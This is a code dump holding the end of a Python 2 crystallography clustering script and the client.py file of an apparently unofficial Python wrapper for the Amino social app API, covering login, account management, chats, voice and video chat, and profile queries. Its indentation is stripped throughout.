print_table(results['pCC_selection'])
print '\nxscale_isocluster table from most populated cluster\n'
print_table(results['iso-cluster'])
print '\n\n'
if len(proc.xscale_file_list) > 200:
hkl_file_cell = os.path.join(mm.subadm, 'Cell_Select.LP')
if os.path.isfile(hkl_file_cell):
cell_hist = Cell(hkl_file_cell)
cell_hist.cell_histogram()
else:
import scipy.cluster.hierarchy as sch
fig = plt.figure()
dn = sch.dendrogram(results['hclust_matrix'], p=10, labels=results['dendro_labels'], truncate_mode='level')
fig.savefig('cell-dendrogram.png', dpi=300)
except (KeyError, TypeError) as e:
print "xscaleing had error, check \n"
return
if __name__ == '__main__':
main()
|
client.py
|
import json
import base64
from zipfile import ZipFile
import requests
import threading
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
self.session = requests.Session()
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
def parse_headers(self, data = None):
if data:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
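    # Usage sketch (not part of the library): joining a voice chat from an already
    # authenticated client; the community and chat IDs below are placeholders.
    #
    #   client.join_voice_chat(comId="123456", chatId="chat-id-placeholder")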
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
sleep(1)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
self.active = True
        threading.Thread(target=self.run_vc, args=[comId, chatId, joinType]).start()  # start the keep-alive loop
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def start_video(self, comId: str, chatId: str, path: str, title: str, background: BinaryIO, duration: int):
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 1,
"id": "10335106"
},
"t": 112
}
        self.send(json.dumps(data))
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"channelType": 5,
"id": "10335436"
},
"t": 108
}
        self.send(json.dumps(data))
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"playlist": {
"currentItemIndex": 0,
"currentItemStatus": 1,
"items": [{
"author": None,
"duration": duration,
"isDone": False,
"mediaList": [[100, self.upload_media(background, "image"), None]],
"title": title,
"type": 1,
"url": f"file://{path}"
}]
},
"id": "3423239"
},
"t": 120
}
        self.send(json.dumps(data))
sleep(2)
data["o"]["playlist"]["currentItemStatus"] = 2
data["o"]["playlist"]["items"][0]["isDone"] = True
        self.send(json.dumps(data))
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.run_amino_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_amino_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.run_amino_socket()
return response.status_code
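    # Usage sketch (not part of the library): a minimal login flow; the email and
    # password values are placeholders, and the attributes read afterwards are the
    # ones this method sets on success.
    #
    #   client = Client()
    #   status = client.login(email="user@example.com", password="example-password")
    #   print(status)                 # 200 on success
    #   print(client.userId, client.sid)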
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/register", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
            self.account = None
            self.profile = None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
        Request a verification code for the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
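    # Usage sketch (hypothetical email/code values): request a verification code, then
    # confirm it with verify() once the code arrives by mail.
    #
    #   client.request_verify_code(email="user@example.com")
    #   client.verify(email="user@example.com", code="123456")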
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = self.session.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = self.session.get(f"{self.api}/g/s/account", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
        Upload a file to the Amino servers.
        **Parameters**
            - **file** : File to be uploaded.
            - **fileType** : Type of the file, either ``audio`` or ``image``.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
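    # Usage sketch (assumes a local JPEG; the path is a placeholder): upload an image
    # and reuse the returned media URL, e.g. as a chat background or embed image.
    #
    #   with open("picture.jpg", "rb") as fp:
    #       media_url = client.upload_media(fp, "image")
    #   print(media_url)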
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = self.session.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
        Information about a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
        Get the Chat Object from a Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
        Join a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_chat(self, chatId: str):
"""
        Leave a Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def start_chat(self, userId: [str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
        Start a Chat with a User or a List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
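    # Usage sketch (placeholder user IDs): start a group chat with two users and an
    # opening message.
    #
    #   client.start_chat(userId=["uid-1", "uid-2"],
    #                     message="hello there", title="My group chat")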
def invite_to_chat(self, userId: [str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
        allowRejoin = 1 if allowRejoin else 0
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
        List of Messages from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = self.session.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
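    # Pagination sketch (assumption: the returned GetMessages object exposes a
    # nextPageToken attribute; the chat ID is a placeholder):
    #
    #   page = client.get_chat_messages(chatId="chat-id-placeholder", size=25)
    #   older = client.get_chat_messages(chatId="chat-id-placeholder", size=25,
    #                                    pageToken=page.nextPageToken)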
def get_message_info(self, chatId: str, messageId: str):
"""
        Information about a Message from a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
        Information about a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
        Search a Community by its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = self.session.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
response = self.session.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
        List of Wall Comments of a User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
